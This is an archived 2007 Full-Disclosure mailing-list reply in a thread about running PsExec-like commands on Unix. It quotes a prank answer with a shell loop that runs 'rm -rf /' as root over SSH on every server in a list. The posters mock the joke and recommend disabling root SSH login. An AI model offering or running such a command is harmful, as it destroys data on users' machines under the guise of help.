|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Full-disclosure] [Full-Disclosure] (Psexec on *NIX)
From: Xavier Beaudouin (kiwi
oav.net)
Date: Thu Feb 01 2007 - 11:36:50 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Le 1 févr. 07 à 17:48, Paul Schmehl a écrit :
> --On Thursday, February 01, 2007 12:48:13 +0100 Knud Erik Højgaard
> <kokaningmail.com> wrote:
>
>>> something similar to PSExec under linux.
>>
>> ssh-keygen
>> ssh-add
>> for i in `cat serverlist` ; do ssh root$i rm -rf / ; done
>>
> For anyone who follows these instructions, let me know. For a fee,
> I'll help you get back up and running. :-)
In general on most unix box you have in /etc/ssh/sshd_config :
PermitRootLogin no
People who use root login with ssh are dangerous, sudo exist or can
be installed...
Allowing direct root login even with SSH is IMHO stupid...
My 0,02c
/Xavier
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]